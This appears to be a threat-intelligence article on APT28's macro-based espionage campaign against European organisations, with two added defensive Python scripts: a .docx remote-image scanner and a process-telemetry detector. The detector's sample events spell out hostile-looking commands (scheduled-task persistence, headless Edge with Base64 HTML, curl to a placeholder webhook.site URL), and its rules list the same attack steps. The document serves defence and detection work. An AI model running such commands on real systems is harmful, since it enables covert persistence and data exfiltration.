APT28 Targeted European Entities Using Webhook-Based Macro Malware

APT28 Unleashes Operation MacroMaze: A Stealthy New Cyber Assault on Europe

By Ravie Lakshmanan | February 23, 2026 | Malware / Threat Intelligence

In a chilling reminder that even the most sophisticated cyber adversaries are doubling down on simplicity, the notorious Russian state-sponsored hacking group APT28—also known as Fancy Bear—has been linked to a new espionage campaign targeting high-value organizations across Western and Central Europe. Codenamed Operation MacroMaze, this campaign is a masterclass in stealth, leveraging basic tools and legitimate services to infiltrate, persist, and exfiltrate sensitive data without raising alarms.

The Anatomy of a Silent Invasion

Between September 2025 and January 2026, APT28 orchestrated a series of spear-phishing attacks designed to lure unsuspecting victims into opening malicious documents. These documents, seemingly innocuous, contain a hidden weapon: an “INCLUDEPICTURE” field in the document’s XML that points to a webhook[.]site URL hosting a JPG image. When the document is opened, Word fetches the image from the remote server, triggering an outbound HTTP request that acts as a tracking pixel. This clever mechanism allows the attackers to confirm the document has been opened and gather metadata about the recipient.
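The tracking-pixel field described above is something a mail gateway or analyst can look for statically, because a .docx is just a zip of XML parts. The scanner below is an added example written for this page, not LAB52's tooling or anything from the report: it opens a .docx in memory, extracts INCLUDEPICTURE field codes (both the simple `w:fldSimple` form and the multi-run `w:instrText` form) and image relationships marked `TargetMode="External"`, and flags any URL whose host is on a small blocklist. The sample document, the blocklist contents, and the `PLACEHOLDER-TOKEN` path in the URL are constructed here; only the webhook.site domain comes from the article.

```python
"""Scan a .docx for remote image references that make Word reach out on open.

Added example for this page (not LAB52's or any vendor's tooling).  It looks for
INCLUDEPICTURE field codes with an http(s) URL and for image relationships marked
TargetMode="External", and flags hosts on a small blocklist.
"""
import html
import io
import re
import zipfile
from dataclasses import dataclass
from typing import List
from urllib.parse import urlsplit

# webhook.site is the service named in the article; a real deployment would load
# its own blocklist here.
SUSPICIOUS_HOSTS = ("webhook.site",)

# Field instructions appear either as <w:fldSimple w:instr="..."> or as one or
# more <w:instrText> runs following a <w:fldChar w:fldCharType="begin"/>.
_INSTR_RE = re.compile(r"<w:instrText[^>]*>(.*?)</w:instrText>", re.S)
_SIMPLE_RE = re.compile(r'<w:fldSimple[^>]*?w:instr="([^"]*)"', re.S)
_BEGIN_RE = re.compile(r'<w:fldChar[^>]*?w:fldCharType="begin"')
_PIC_URL_RE = re.compile(r'INCLUDEPICTURE\s+"?(https?://[^"\s\\]+)', re.I)
# Linked (non-embedded) images are recorded as external relationships in .rels.
_EXT_REL_RE = re.compile(
    r'<Relationship\b(?=[^>]*TargetMode="External")[^>]*Target="(https?://[^"]+)"', re.S)


@dataclass(frozen=True)
class Finding:
    part: str        # zip member the reference was found in
    url: str
    host: str
    suspicious: bool


def _field_instructions(xml: str) -> List[str]:
    """Return every field instruction string in one XML part."""
    instrs = []
    # Complex fields: instrText runs between one "begin" and the next belong to one field.
    for segment in _BEGIN_RE.split(xml)[1:]:
        instrs.append("".join(_INSTR_RE.findall(segment)))
    instrs.extend(_SIMPLE_RE.findall(xml))
    return [html.unescape(i) for i in instrs]


def _finding(part: str, url: str) -> Finding:
    host = (urlsplit(url).hostname or "").lower()
    flagged = any(host == h or host.endswith("." + h) for h in SUSPICIOUS_HOSTS)
    return Finding(part, url, host, flagged)


def scan_docx(data: bytes) -> List[Finding]:
    """Return every remote image reference found in the .docx bytes, in part order."""
    findings: List[Finding] = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.startswith("word/") or not name.endswith((".xml", ".rels")):
                continue
            text = zf.read(name).decode("utf-8", errors="replace")
            if name.endswith(".rels"):
                urls = [html.unescape(u) for u in _EXT_REL_RE.findall(text)]
            else:
                urls = [u for instr in _field_instructions(text)
                        for u in _PIC_URL_RE.findall(instr)]
            findings.extend(_finding(name, u) for u in urls)
    return findings


# Constructed sample document.  The URL path is a placeholder, not a real token.
SAMPLE_URL = "https://webhook.site/PLACEHOLDER-TOKEN/image.jpg"
_W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"


def build_sample_docx(include_remote: bool = True) -> bytes:
    """Minimal in-memory .docx: a benign DATE field and, optionally, an
    INCLUDEPICTURE field plus the matching external image relationship."""
    picture_field = (
        '<w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r>'
        '<w:r><w:instrText xml:space="preserve"> INCLUDEPICTURE "</w:instrText></w:r>'
        f'<w:r><w:instrText xml:space="preserve">{SAMPLE_URL}" \\d </w:instrText></w:r>'
        '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
        '<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p>'
    ) if include_remote else ""
    relationship = (
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" '
        f'Target="{SAMPLE_URL}" TargetMode="External"/>'
    ) if include_remote else ""
    document_xml = (
        f'<?xml version="1.0" encoding="UTF-8"?><w:document xmlns:w="{_W_NS}"><w:body>'
        '<w:p><w:fldSimple w:instr=" DATE \\@ &quot;d MMMM yyyy&quot; "><w:r><w:t>1 January 2026</w:t></w:r></w:fldSimple></w:p>'
        f'{picture_field}</w:body></w:document>'
    )
    rels_xml = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        f'{relationship}</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml", document_xml)
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


if __name__ == "__main__":
    for f in scan_docx(build_sample_docx()):
        print("SUSPICIOUS" if f.suspicious else "remote", f.part, f.url)
```

Two things worth noting about the design. Any http(s) image reference is reported, not only blocklisted hosts, because a remote image in an inbound document is itself a reason to detonate it in a sandbox with outbound HTTP logged. And the field-code and relationship checks are deliberately separate: Word records a linked picture in both places, but a hand-crafted document may carry only one of them.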

But this is just the beginning. The real danger lies in the macros embedded within these documents. LAB52, a Spanish cybersecurity firm, identified multiple variants of these macros, each evolving in sophistication to evade detection. The macros function as droppers, establishing a foothold on the compromised host and delivering additional payloads.

Evolving Evasion Techniques

The macros have undergone a fascinating evolution. Older versions relied on “headless” browser execution, a technique that runs the browser without a graphical user interface, making it harder to detect. Newer versions, however, have adopted keyboard simulation (SendKeys) to bypass security prompts, showcasing APT28’s adaptability and resourcefulness.

Once executed, the macro launches a Visual Basic Script (VBScript) that moves the infection to the next stage. This script runs a CMD file to establish persistence via scheduled tasks and launches a batch script. The batch script renders a small Base64-encoded HTML payload in Microsoft Edge in headless mode, further evading detection. It then retrieves a command from the webhook[.]site endpoint, executes it, captures its output, and exfiltrates it to another webhook[.]site instance in the form of an HTML file.

A Second Variant: Off-Screen Execution

In a twist that underscores APT28’s ingenuity, a second variant of the batch script has been discovered. This version eschews headless execution in favor of moving the browser window off-screen. It then aggressively terminates all other Edge browser processes to ensure a controlled environment. When the resulting HTML file is rendered by Microsoft Edge, the form is submitted, causing the collected command output to be exfiltrated to the remote webhook endpoint without any user interaction.

“This browser-based exfiltration technique leverages standard HTML functionality to transmit data while minimizing detectable artifacts on disk,” LAB52 explained. The use of widely used webhook services for both payload delivery and data exfiltration adds another layer of stealth, making it difficult for defenders to trace the attackers’ activities.
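The execution chain laid out in the two sections above (Office macro spawning a script host, a CMD file registering a scheduled task, Edge started headless or with its window pushed off-screen to render an inline Base64 HTML page, other Edge processes killed, and webhook[.]site contacted for tasking and exfiltration) is mostly visible in process-creation telemetry. The detector below is an added example written for this page, not LAB52's or any product's logic. It walks constructed JSON process events, tracks parent lineage per host so that "descends from an Office application" can be evaluated, scores each host against a handful of weighted rules, and returns the hosts over a threshold. The event format, field names, hostnames, file paths, weights, and the exact Edge flags (`--headless`, `--window-position`) are assumptions for the sake of the example; the `PLACEHOLDER-TOKEN` webhook path is constructed.

```python
"""Score process-creation telemetry for the macro -> script -> CMD -> batch ->
hidden Edge -> webhook chain described above.

Added example for this page.  The event schema, sample lines, rule weights and
Edge command-line flags are assumptions, not values from LAB52's report."""
import json
import re
from dataclasses import dataclass, field
from typing import Callable, Dict, Iterable, List, Tuple

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "cmd.exe", "powershell.exe", "mshta.exe"}
ALERT_THRESHOLD = 8  # assumed; tune on your own baseline


@dataclass
class Event:
    host: str
    pid: int
    ppid: int
    image: str
    cmdline: str
    parent_image: str = ""
    office_lineage: bool = False  # True when any ancestor is an Office application


@dataclass
class HostReport:
    score: int = 0
    hits: List[Tuple[str, int]] = field(default_factory=list)  # (rule id, pid)


def _offscreen(cmdline: str) -> bool:
    """Chromium-style --window-position=x,y with a negative coordinate."""
    m = re.search(r"--window-position=(-?\d+),(-?\d+)", cmdline)
    return bool(m) and (int(m.group(1)) < 0 or int(m.group(2)) < 0)


# (rule id, weight, predicate).  Each rule maps to one step of the chain.
RULES: List[Tuple[str, int, Callable[[Event], bool]]] = [
    ("office_spawns_script", 3,
     lambda e: e.parent_image in OFFICE_IMAGES and e.image in SCRIPT_HOSTS),
    ("schtasks_create_from_office_lineage", 4,
     lambda e: e.image == "schtasks.exe" and "/create" in e.cmdline.lower() and e.office_lineage),
    ("edge_headless", 3,
     lambda e: e.image == "msedge.exe" and "--headless" in e.cmdline),
    ("edge_offscreen_window", 3,
     lambda e: e.image == "msedge.exe" and _offscreen(e.cmdline)),
    ("edge_inline_base64_html", 4,
     lambda e: e.image == "msedge.exe" and "data:text/html;base64," in e.cmdline),
    ("taskkill_edge", 2,
     lambda e: e.image == "taskkill.exe" and "msedge" in e.cmdline.lower()),
    ("webhook_site_in_cmdline", 4,
     lambda e: "webhook.site" in e.cmdline.lower()),
]


def analyze(lines: Iterable[str]) -> Dict[str, HostReport]:
    """Consume JSON process events in time order and score every host seen."""
    procs: Dict[Tuple[str, int], Event] = {}
    reports: Dict[str, HostReport] = {}
    for line in lines:
        line = line.strip()
        if not line:
            continue
        raw = json.loads(line)
        ev = Event(raw["host"], int(raw["pid"]), int(raw["ppid"]),
                   raw["image"].lower(), raw["cmdline"])
        parent = procs.get((ev.host, ev.ppid))
        if parent is not None:
            ev.parent_image = parent.image
            ev.office_lineage = parent.image in OFFICE_IMAGES or parent.office_lineage
        procs[(ev.host, ev.pid)] = ev
        report = reports.setdefault(ev.host, HostReport())
        for rule_id, weight, pred in RULES:
            if pred(ev):
                report.score += weight
                report.hits.append((rule_id, ev.pid))
    return reports


def alerts(reports: Dict[str, HostReport]) -> List[str]:
    return sorted(h for h, r in reports.items() if r.score >= ALERT_THRESHOLD)


# Constructed sample telemetry: one host showing the full chain, one benign host.
SAMPLE_EVENTS = r"""
{"host":"WS-FIN-07","pid":4120,"ppid":900,"image":"WINWORD.EXE","cmdline":"WINWORD.EXE /n C:\\Users\\u\\Downloads\\invite.docm"}
{"host":"WS-FIN-07","pid":4312,"ppid":4120,"image":"wscript.exe","cmdline":"wscript.exe //B C:\\Users\\u\\AppData\\Local\\Temp\\s.vbs"}
{"host":"WS-FIN-07","pid":4400,"ppid":4312,"image":"cmd.exe","cmdline":"cmd.exe /c C:\\Users\\u\\AppData\\Local\\Temp\\run.cmd"}
{"host":"WS-FIN-07","pid":4410,"ppid":4400,"image":"schtasks.exe","cmdline":"schtasks.exe /Create /SC MINUTE /MO 30 /TN Updater /TR C:\\Users\\u\\AppData\\Local\\Temp\\run.bat /F"}
{"host":"WS-FIN-07","pid":4420,"ppid":4400,"image":"cmd.exe","cmdline":"cmd.exe /c C:\\Users\\u\\AppData\\Local\\Temp\\run.bat"}
{"host":"WS-FIN-07","pid":4430,"ppid":4420,"image":"taskkill.exe","cmdline":"taskkill /F /IM msedge.exe"}
{"host":"WS-FIN-07","pid":4440,"ppid":4420,"image":"msedge.exe","cmdline":"msedge.exe --headless --disable-gpu data:text/html;base64,PGh0bWw+"}
{"host":"WS-FIN-07","pid":4450,"ppid":4420,"image":"msedge.exe","cmdline":"msedge.exe --window-position=-32000,-32000 C:\\Users\\u\\AppData\\Local\\Temp\\out.html"}
{"host":"WS-FIN-07","pid":4460,"ppid":4420,"image":"curl.exe","cmdline":"curl.exe -s https://webhook.site/PLACEHOLDER-TOKEN"}
{"host":"WS-HR-02","pid":5000,"ppid":800,"image":"explorer.exe","cmdline":"explorer.exe"}
{"host":"WS-HR-02","pid":5100,"ppid":5000,"image":"msedge.exe","cmdline":"msedge.exe --profile-directory=Default https://intranet.example/"}
{"host":"WS-HR-02","pid":5200,"ppid":5000,"image":"WINWORD.EXE","cmdline":"WINWORD.EXE /n C:\\Users\\h\\Documents\\report.docx"}
"""

if __name__ == "__main__":
    for host, rep in analyze(SAMPLE_EVENTS.splitlines()).items():
        print(host, rep.score, [r for r, _ in rep.hits])
    print("alert:", alerts(analyze(SAMPLE_EVENTS.splitlines())))
```

The scoring is additive on purpose: a lone headless Edge launch is common in build and test tooling, and a single webhook.site request may be a developer testing an integration, but several of these steps on one workstation within the same Office-rooted process tree is the pattern the article describes and is worth a ticket. Pairing these rules with the document scanner above (block at the gateway, alert on the endpoint) covers both ends of the chain.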

The Power of Simplicity

What makes Operation MacroMaze particularly alarming is its reliance on basic tools—batch files, tiny VBScript launchers, and simple HTML. Yet, these tools are arranged with meticulous care to maximize stealth. By moving operations into hidden or off-screen browser sessions, cleaning up artifacts, and outsourcing critical functions to legitimate services, APT28 has crafted a campaign that is both effective and difficult to detect.

“This campaign proves that simplicity can be powerful,” LAB52 noted. “The attacker uses very basic tools but arranges them with care to maximize stealth.”

A Wake-Up Call for Cybersecurity

Operation MacroMaze is a stark reminder that even the most advanced cyber threats can be executed with relatively simple tools. It underscores the importance of vigilance, employee training, and robust cybersecurity measures. Organizations must remain vigilant against spear-phishing attacks and ensure that their systems are equipped to detect and mitigate such threats.

As APT28 continues to evolve its tactics, the cybersecurity community must stay one step ahead. Operation MacroMaze is not just a campaign; it is a wake-up call for organizations worldwide to bolster their defenses and remain ever-watchful in the face of increasingly sophisticated cyber threats.


Tags: APT28, Fancy Bear, Operation MacroMaze, Russian hackers, cyber espionage, spear-phishing, malware, threat intelligence, webhook[.]site, Microsoft Office, VBScript, cybersecurity, Europe, state-sponsored attacks, stealth malware, data exfiltration
